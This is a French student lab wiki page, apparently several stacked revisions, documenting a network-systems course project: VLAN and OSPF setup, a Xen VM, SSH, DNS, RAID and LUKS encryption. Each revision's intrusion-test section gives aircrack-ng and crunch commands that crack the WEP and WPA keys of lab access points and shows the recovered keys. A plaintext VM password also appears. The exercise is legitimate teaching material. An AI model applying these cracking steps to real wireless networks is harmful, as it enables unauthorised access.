Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour démarrer, nous formatons la clé :<br />
mkfs.ext4 /dev/sdb<br />
<br />
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :<br />
cryptsetup luksFormat /dev/sdb<br />
<br />
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte <br />
cryptsetup luksOpen /dev/sdb crypte<br />
Puis nous le formatons<br />
mkfs.ext4 /dev/mapper/crypte <br />
<br />
Nous montons ensuite la partition afin d'y ajouter un fichier test :<br />
mkdir /mnt/cryptUSB<br />
mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/<br />
<br />
Nous créons ce fichier test.txt en y inscrivant "BONJOUR MONDE !" :<br />
nano /mnt/cryptUSB/test.txt<br />
<br />
Enfin, nous démontons et fermons le volume chiffré :<br />
umount /mnt/cryptUSB<br />
cryptsetup luksClose crypte<br />
<br />
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57704TP sysres IMA5 2021/2022 G72022-01-10T16:10:02Z<p>Avercaem : /* Chiffrement de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :<br />
fdisk -l<br />
#sélection de la clé à formater<br />
fdisk /dev/sdb<br />
o #creation table MBR<br />
n #creation nouvelle partition<br />
w #écriture sur la clé<br />
<br />
La commande crypsetup utilisée est la suivante :<br />
cryptsetup open --type plain /dev/sdb1 encryptedDevice<br />
#s'en suit une demande de mdp<br />
<br />
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :<br />
mkfs.ext4 /dev/mapper/encryptedDevice<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57703TP sysres IMA5 2021/2022 G72022-01-10T16:09:31Z<p>Avercaem : /* Chiffrement de données */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
Nous créons ensuite les 2 disques virtuels <br />
<br />
lvcreate -L10G -n Anosteke1 storage<br />
lvcreate -L10G -n Anosteke2 storage<br />
<br />
Puis nous les formatons<br />
<br />
mkfs.ext4 /dev/storage/Anosteke1<br />
mkfs.ext4 /dev/storage/Anosteke2<br />
<br />
Nous ajoutons les 2 disques au fichier de configuration de notre VM <br />
<br />
nano /etc/xen/Anosteke.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Anosteke1,xvda3,w',<br />
'phy:/dev/storage/Anosteke2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]<br />
<br />
On peut ensuite démarrer notre VM<br />
<br />
xl create -c /etc/xen/AnosTeke.cfg<br />
<br />
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces<br />
<br />
mkdir /mnt/xvda3<br />
mkdir /mnt/xvda4<br />
mount /dev/xvda3 /mnt/xvda3<br />
mount /dev/xvda4 /mnt/xvda4<br />
mv /var/* /mnt/xvda4<br />
<br />
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements<br />
<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On les configure DUMP disabled et Fsck 2.<br />
On peut finalement lancer le MOUNT<br />
<br />
mount -a<br />
<br />
et vérifier la bonne execution<br />
lsblk<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
sur le serveur nous pouvons vérifier que notre machine existe : <br />
xen-list-images | grep Name: %nom de la vm%<br />
lsblk | grep %nom de la vm%<br />
et finalement pour lister les machines en fonctionnement<br />
xen list<br />
<br />
On peut ensuite se connecter à la machine<br />
xen console Anosteke<br />
<br />
On en profite pour ajouter un nouvel utilisateur<br />
sudo adduser pifou<br />
<br />
Et installer les paquets<br />
apt-get update<br />
apt-get upgrade<br />
<br />
== Services Internet ==<br />
=== Serveur SSH ===<br />
On vérifie que OpenSSH est installé <br />
ssh -V<br />
<br />
Si il ne l'est pas on l'install. <br />
sudo apt install openssh-server<br />
<br />
Pour lancer et arreter le service SSH : <br />
sudo service ssh stop<br />
sudo service ssh start<br />
<br />
Pour desactiver le service : <br />
sudo systemctl disable ssh<br />
<br />
Pour connaitre l'état du service : <br />
sudo systemctl status ssh<br />
<br />
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config<br />
/etc/ssh<br />
├── ssh_config<br />
├── sshd_config<br />
├── ssh_host_rsa_key<br />
└── ssh_host_rsa_key.pub<br />
<br />
Dans ce fichier on modifie les paramètres suivants : <br />
Port 22<br />
LogLevel VERBOSE<br />
PermitRootLogin no<br />
Banner /etc/ssh/banner<br />
<br />
On redemarre ensuite le service SSH<br />
systemctl reaload ssh.service<br />
<br />
=== Serveur DNS ===<br />
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net<br />
<br />
On install :<br />
apt-get install bind9<br />
On peut aussi installer le paquet dsnutils pour débugger le service DNS <br />
<br />
Configuration du fichier /etc/bind/named.conf.options<br />
listen-on {any;};<br />
//allow-recursion {localhost;};<br />
<br />
On configure ensuite le bind de notre nom de domaine.<br />
/etc/bind/db.anosteke59.site <br />
$TTL 3600<br />
@ IN SOA (<br />
ns.anosteke.site.<br />
ns6.gandi.net.<br />
2;<br />
3600;<br />
3600;<br />
3600;<br />
3600;<br />
)<br />
<br />
IN NS ns6.gandi.net. <br />
www IN A 193.48.57.182<br />
ns IN CNAME www<br />
<br />
<br />
On vérifie que la configuration est cohérente à l'aide de <br />
named-checkzone anosteke59.site /etc/bind/db.anosteke59.site <br />
<br />
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)<br />
nslookup anosteke59.site <br />
dig anosteke59.site<br />
<br />
=== Sécurisation de site par certificat ===<br />
On crée une demande de certificat avec la commande : <br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr<br />
<br />
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. <br />
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.<br />
<br />
=== Sécurisation de serveur DNS par DNSSEC ===<br />
<br />
== Réalisation ==<br />
=== Sécurisation de données ===<br />
Sur le serveur Xen, on créer nos volumes. <br />
lvcreate -L1G -nAnosteke-raid-1 storage<br />
lvcreate -L1G -nAnosteke-raid-2 storage<br />
lvcreate -L1G -nAnosteke-raid-3 storage<br />
<br />
Qu'on ajoute à la configuration de notre VM<br />
'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',<br />
'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',<br />
'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'<br />
<br />
Après un rédémarrage de la VM on execute <br />
<br />
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3<br />
<br />
On formate la partition:<br />
<br />
mkfs.ext4 /dev/md0<br />
<br />
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
et on valide les modifications:<br />
<br />
mount -a<br />
<br />
=== Chiffrement de données ===<br />
<br />
Pour sécuriser une clé avec un mot de passe, nous avons utilisé cryptsetup. On s'assure d'abord de partir sur une clé toute propre :<br />
fdisk -l<br />
#sélection de la clé à formater<br />
fdisk /dev/sdb<br />
o #creation table MBR<br />
n #creation nouvelle partition<br />
w #écriture sur la clé<br />
<br />
La commande crypsetup utilisée est la suivante :<br />
cryptsetup open --type plain /dev/sdb1 encryptedDevice<br />
#s'en suit une demande de mdp<br />
<br />
Elle monte ensuite dans le dossier ''/dev/mapper'' et il devient possible de la formater :<br />
mkfs.ext4 /dev/mapper/encryptedDevice<br />
<br />
=== Tests d’intrusion ===<br />
<br />
== WEP ==<br />
On commence par casser la clé WEP.<br />
<br />
airmon-ng<br />
<br />
puis on lance <br />
<br />
airmon-ng start wlan0mon 4<br />
<br />
3 représente la channel utilisée par l'ap (ici 3)<br />
<br />
Notre interface est renommée 'wlan0mon'.<br />
Pour visualiser les paquets sniffés, on execute alors<br />
<br />
airodump-ng -c 4 wlan0mon<br />
<br />
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :<br />
<br />
airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
Après quelques minutes, on execute :<br />
<br />
aircrack-ng dump*.cap<br />
<br />
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.<br />
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44<br />
<br />
== WPA ==<br />
<br />
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :<br />
<br />
airodump-ng -c 9 wlan0mon<br />
<br />
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :<br />
<br />
airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon<br />
<br />
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :<br />
<br />
crunch 8 8 0123456789 -o password.lst<br />
<br />
Enfin, on lance la commande :<br />
<br />
aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap<br />
<br />
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
<br />
<br />
=== Chiffrement de données ===<br />
=== Inspection ARP par un élément réseau ===<br />
=== Sécurisation WiFi par WPA2-EAP ===</div>Avercaemhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&diff=57699TP sysres IMA5 2021/2022 G72022-01-10T16:01:51Z<p>Avercaem : /* WEP */</p>
<hr />
<div><br />
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =<br />
<br />
==Répartition travail==<br />
<br />
== Architecture réseau ==<br />
<br />
=== Configuration IPV4 ===<br />
<br />
==== Paramétrage des VLANs ====<br />
<br />
'''9200'''<br />
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306<br />
<br />
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs<br />
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.<br />
<br />
enable<br />
conf t<br />
vlan 42<br />
exit<br />
int vlan 42<br />
no shut<br />
ip address 193.48.57.188 255.255.255.192<br />
ipv6 enable<br />
ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64<br />
exit<br />
int TenGigabitethernet1/1/2<br />
no shut<br />
switchport mode access<br />
switchport access vlan 42<br />
exit<br />
exit<br />
write<br />
<br />
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet<br />
<br />
enable<br />
conf t<br />
vlan 531<br />
exit<br />
int vlan 531<br />
no shut<br />
ip address 192.168.222.42 255.255.255.248<br />
exit<br />
int TenGigabitethernet1/1/1<br />
no shut<br />
switchport mode access<br />
switchport access vlan 531<br />
exit<br />
exit<br />
write<br />
<br />
==== OPSF ====<br />
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.<br />
<br />
router ospf 1 <br />
router-id 10.00.0.1 <br />
log-adjacency-changes <br />
summary-address 193.48.57.176 255.255.255.240 <br />
summary-address 100.64.0.0 255.240.0.0 not-advertise <br />
summary-address 10.0.0.0 255.0.0.0 not-advertise <br />
redistribute connected subnets <br />
redistribute static subnets <br />
network 192.168.222.8 0.0.0.7 area 2<br />
<br />
== Installation des systèmes d’exploitation ==<br />
=== Installation dans la machine virtuelle Xen ===<br />
<br />
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM<br />
<br />
xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
